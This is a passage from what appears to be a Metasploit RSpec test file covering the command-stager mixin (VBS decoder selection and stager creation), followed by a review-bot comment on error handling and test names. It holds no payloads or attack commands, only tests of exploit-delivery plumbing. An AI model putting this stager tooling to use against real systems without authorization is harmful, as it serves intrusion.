end
context "and decoder set in the opts" do
let(:decoder_opts) do
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")
end
it "returns the decoder_opts" do
expect(subject.select_decoder(:decoder => decoder_opts)).to eq(decoder_opts)
end
end
end
end
describe "#opts_with_decoder" do
subject do
create_exploit
end
context "with :decoder option" do
let(:decoder) do
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")
end
it "returns the :decoder option" do
expect(subject.opts_with_decoder(:decoder => decoder)).to include(:decoder)
end
end
context "without decoder option" do
it ":hasn't decoder option" do
expect(subject.opts_with_decoder).not_to include(:decoder)
end
end
end
describe "#create_stager" do
subject do
create_exploit
end
context "with correct flavor" do
let(:flavor) do
:vbs
end
let(:expected_class) do
described_class::STAGERS[flavor]
end
before do
subject.flavor = flavor
end
it "creates the correct instance" do
expect(subject.create_stager.class).to eq(expected_class)
end
end
context "with incorrect flavor" do
let(:flavor) do
:incorrect_flavor
end
let(:expected_class) do
described_class::STAGERS[flavor]
end
before do
subject.flavor = flavor
end
it "raises a NoMethodError" do
expect { subject.create_stager }.to raise_error(NoMethodError)
end
end
end
end
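Review bot: In `#create_stager`, the "with incorrect flavor" example expects `NoMethodError`, which pins what looks like an accidental failure (presumably a call on the `nil` returned by the `STAGERS` lookup) rather than a deliberate one. `select_cmdstager` already raises `ArgumentError` for bad input, and `create_stager` could do the same so the example becomes `expect { subject.create_stager }.to raise_error(ArgumentError)`. The `let(:expected_class)` in that context is never used. Two example names are also misleading: "guess the platform defulat flavor" has a typo, and `it "returns datastore flavor"` under `#select_decoder` should read `it "returns the datastore decoder"`.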